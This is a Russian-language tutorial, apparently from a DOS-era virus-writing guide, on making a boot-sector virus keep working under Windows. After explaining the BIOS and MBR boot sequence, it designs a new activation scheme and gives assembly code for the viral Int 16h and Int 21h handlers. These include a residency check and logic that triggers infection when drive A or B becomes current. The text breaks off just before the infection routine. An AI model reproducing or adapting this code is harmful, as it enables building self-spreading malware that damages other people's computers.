"Наш путь труден, но
 перспективы - светлые !"
 Мао Цзедун
* Данная работа является обновленной версией статьи "Несколько слов о
 загрузочных вирусах".По сравнению с предыдущей версией, статья суще-
 ственно переработана и дополнена:
 1.Алгоритм работы вируса принципиально изменен.Теперь вирус работает
 при запуске из - под WINDOWS различных DOS - приложений ( VC, NC и
 т.п. ). Предыдущая версия такой возможностью не обладала.
 2.Исключен материал по переделке вируса в STEALTH.
 3.Изменены кое - какие мелочи
 4.Желающие ознакомиться с предыдущей версией статьи могут воспользо-
 ваться моей книжкой, ссылка на которую находится в конце докумен-
 та.
 1.1 Краткие сведения о начальной загрузке персонального компьютера
Для начала следует сказать несколько слов о том, как происходит на-
чальная загрузка ЭВМ. После проверки аппаратной части компьютера и за-
полнения таблицы векторов прерываний BIOS пытается прочитать первый
сектор нулевой дорожки нулевой стороны диска в дисководе " A ". Этот
сектор помещается в память по адресу 0000:7C00h, после чего на указан-
ный адрес передается управление. В прочитанном секторе содержится про-
грамма начальной загрузки (BOOT - запись) и некоторые другие сведения,
необходимые для доступа к данным на диске. Программа начальной загру-
зки проверяет, является - ли диск системным. Если это так,то загрузка
операционной системы с диска продолжается, а если нет, то на экран вы-
водится сообщение :
Non system disk or disk error
Replace and press any key when ready .
после чего система ожидает действий оператора.Если же диск в " A " -
дисководе отсутствует,то программа BIOS считывает первый сектор нуле-
вой дорожки нулевой стороны первого жесткого диска. Он также помеща-
ется в память по адресу 0000:7C00h, после чего по указанному адресу
передается управление.В прочитанном секторе на жестком диске записана
так называемая MBR (главная загрузочная запись). MBR является про-
граммой, которая определяет активный раздел жесткого диска, считывает
загрузочную запись (BOOT - запись) этого раздела в оперативную память
и отдает ей управление.Дальше все происходит, как при загрузке системы
с гибкого диска. Как видим, процесс загрузки с винчестера является как
бы двухступенчатым.
Если же программа MBR не нашла активный раздел, то выдается сообщение
об отсутствии загрузочных устройств, и система останавливается.В неко-
торых старых машинах при невозможности запустить операционную систему
загружается встроенный язык БЕЙСИК,записанный в микросхемах ПЗУ.
 1.2 Понятие о загрузочных вирусах
Загрузочными называют вирусы, способные заражать загрузочные сектора
гибких и жестких дисков и получающие управление при попытке "запус-
тить " операционную систему с зараженного диска.
Можно выделить следующие основные разновидности вирусных программ
указанного типа :
1. Заражающие BOOT - сектора гибких дисков
2. Заражающие BOOT - запись активного раздела жесткого диска и
 BOOT - сектора гибких дисков
3. Заражающие MBR (Master Boot Record) жесткого диска и BOOT - сектора
 гибких дисков
Отметим, что заражение BOOT - секторов дискет является обязательным,
иначе вирус просто не сможет распространяться .
Кроме того, почти все загрузочные вирусы являются резидентными, что
объясняется спецификой их работы.
 1.3 Анализ традиционного алгоритма работы загрузочного вируса
Как вы, вероятно, знаете, почти все загрузочные вирусы перехватывают
Int 13h и заражают гибкие диски при попытке чтения или записи их со-
держимого через это прерывание.Но, оказывается, такой метод имеет один
серьезный недостаток: при работе под WINDOWS вирус отказывается инфи-
цировать загрузочные сектора дискет.С целью выяснить причины этого яв-
ления автор провел множество экспериментов, которые дали следующий ре-
зультат:
 При чтении или записи гибких дисков WINDOWS не вызывает Int 13h, а
 взаимодействует непосредственно с контроллером дисковода, работая с
 его портами ввода - вывода.
Ясно, что при таком методе работы наш вирус никогда не получит управ-
ления, а будет просто присутствовать в памяти.Таким образом, с помощью
старых методов заставить BOOT - вирус нормально работать под WINDOWS,
скорее всего,не удастся.Необходим совершенно новый подход.Но об этом -
в следующем пункте.
***
 Следует заметить,что при работе с жестким диском WINDOWS все же вы-
 зывает Int 13h, что следует из проведенных автором экспериментов.
***
 1.4 Разрабатываем новый алгоритм активизации
Легче всего сказать, что подход должен быть новым. Труднее предложить
что - то по существу. Были придуманы несколько методик, но все они не
дали положительного результата. И тут автор неожиданно получил очень
своеобразное предложение - вместо Int 13h использовать для активизации
вируса Int 21h. В самом деле, почему бы нам не перехватить Int 21h, и
не попробовать проследить за сменой текущего диска (функция 0Eh).И как
только активным станет дисковод " A " или " B ", заразить диск в этом
дисководе!!! Просто и со вкусом ( идея Danny Dio, за что ему - благо-
дарность ). А мы продолжаем.
 1.5 О перехвате Int 21h программой,
 загружаемой из Master Boot Record
Дело за малым - осталось перехватить Int 21h,и задача решена. Но выяс-
нилось, что это не так просто. Естественно было бы поступить так :
1. Первым делом установить вектор Int 1Ch или Int 08h (оба - таймер)
 на собственный обработчик.
2. Этот обработчик следит за вектором Int 21h, и как только последний
 изменяется - перехватывает Int 21h.
3. Далее обработчик Int 1Ch (Int 08h) " обезвреживает " себя в памяти,
 например, командой "IRET", чтобы машина не зависала.
Так и было сделано, после чего началось самое интересное. Обработчик
Int 21h исправно выполнялся несколько секунд,после чего его бессовес-
тно топили - то ли MSDOS.SYS, то ли COMMAND.COM - не важно.Чтобы из-
бавиться от этого эффекта, я придумал кучу способов - например, ждал
не первого изменения вектора Int 21h, а третьего, десятого и т.п. Как
ни странно,ничего не получалось.Конечно,можно было бы поступить и так:
1. Отловить момент, когда OC уже загружена и начинают выполняться про-
 граммы, записанные, например, в AUTOEXEC.BAT.
2. Перехватить Int 21h.
Проблема здесь в следующем: совершенно неясно, как именно засечь этот
замечательный момент.Кроме того,такой метод тоже не дает стопроцентной
гарантии. Поэтому идею пришлось отклонить, а вместо нее предложить ал-
горитм,который обсуждается в следующем пункте.
 1.6 О применении вектора Int 16h
Как вы, наверное, знаете, прерывание Int 16h является программным и
может вызываться,например,из программы пользователя для выполнения не-
которых действий, таких как чтение символа с клавиатуры, получение ее
флагов и т.п. При этом оно обладает одним замечательным свойством, а
именно - пользовательский обработчик Int 16h не утапливается WINDOWS
при загрузке,и вызывается даже в WORDе, EXCELе и FARе.Так, в проведен-
ном автором эксперименте, при нажатии двух SHIFTов загрузочный сектор
дискеты считывался и тут же записывался на место. Опытная программа
загружалась из MBR и работала в любых WINDOWS - приложениях. Этот факт
решено было использовать для построения "непотопляемой" процедуры об-
работки Int 21h. Итак, предлагаю такой алгоритм:
1. Установить вектор Int 16h на вирусный обработчик.
2. Этот обработчик постоянно вызывает вирусную процедуру Int 21h какой
 - нибудь экзотической собственной функцией, типа AX = 0BABCh.
3. Если вирусная процедура обработки Int 21h активна, она должна " от-
 ветить " на этот вызов (пусть это будет AL = 98h). Если ответа нет,
 обработчик Int 21h не установлен или утоплен, поэтому Int 21h сле-
 дует перехватить.
Не совсем просто, но тоже со вкусом.Сами процедуры обработки Int 16h
и Int 21h могут быть,например, такими:
 ***
 Текст обработчика Int 16h:
 new_16h: push ax ;Сохраним
 push bx ;регистры
 push dx ;в
 push ds ;стеке
 push es ;
 pushf ;
 ;
 mov ax,0babch ;Вызовем вирусный
 int 21h ;обработчик
 cmp al,98h ;Int 21h собст-
 je cs:rrr_rrr ;венной функцией
 ;AX = 0babch.Если
 ;обработчик акти-
 ;вен, мы должны
 ;получить AL=98h,
 ;иначе Int 21h
 ;следует перехва-
 ;тить, чем мы и
 ;займемся:
 push cs ;DS = CS
 pop ds ;
 ;
 cli ;Запретить преры-
 ;вания
 mov ax,3521h ;Получим и сохра-
 int 21h ;ним вектор
 mov old_21h - 100h,bx ;Int 21h
 mov old_21h_2 - 100h,es;
 ;
 mov ax,2521h ;А теперь пере-
 mov dx,to_new_21h ;ставим этот век-
 int 21h ;тор на вирусный
 ;обработчик
 sti ;Разрешить преры-
 ;вания
 rrr_rrr: popf ;Восстановим
 pop es ;из
 pop ds ;стека
 pop dx ;регистры
 pop bx ;
 pop ax ;
 ;
 db 0eah ;И перейдем на
 old_16h dw 0 ;системный обра-
 old_16h_2 dw 0 ;ботчик Int 16h
 ***
 Текст обработчика Int 21h (он отслеживает смену
 оператором текущего диска.Если текущим станови-
 тся диск "A" или "B", обработчик заражает этот
 диск):
 new_21h: pushf ;Этот участок
 cmp ax,0babch ;обработчика
 jne cs:else_func ;Int 21h отвечает
 mov al,98h ;обработчику
 popf ;Int 16h значени-
 iret ;ем AL = 98h; это
 ;служит признаком
 ;активности виру-
 ;сной процедуры
 ;обработки
 ;Int 21h
 ;
 else_func: popf ;Сохраним
 push ax ;регистры
 push bx ;в
 push cx ;стеке
 push dx ;
 push di ;
 push ds ;
 push es ;
 pushf ;
 ;
 cmp ah,0eh ;Смена текущего
 ;диска ?
 jne cs:restore_regs ;Нет - на выход
 cmp dl,1 ;Да - текущим
 ;хотят сделать
 ;" A " или " B "
 ;дисковод ?
 ja cs:restore_regs ;Нет - на выход
 ;Иначе - продол-
 ;жим :
Далее следует " заразная " часть процедуры обработки Int 21h:
 ; ...<... Читать дальше »